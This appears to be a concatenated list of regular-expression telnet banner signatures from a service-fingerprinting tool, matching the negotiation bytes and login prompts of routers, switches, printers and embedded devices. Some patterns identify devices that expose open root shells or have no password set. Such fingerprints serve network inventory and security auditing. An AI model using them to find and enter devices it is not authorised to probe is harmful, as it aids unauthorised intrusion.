+\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: +\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n +\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n s s s s s s s s s s s s s s s s s \r\nssss ssss ssssss sss sss sssss ss sssss sss sss sssss\r\nLogin: +\r\nPRO2 Control Console\r\n +\w{12}\r\nETHMAC ([0-9a-f:]+)\r\nWIFIMAC ([0-9a-f:]+)\r\n> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWireless AP Manager Console [^\r\n]+\r\n please enter your password: 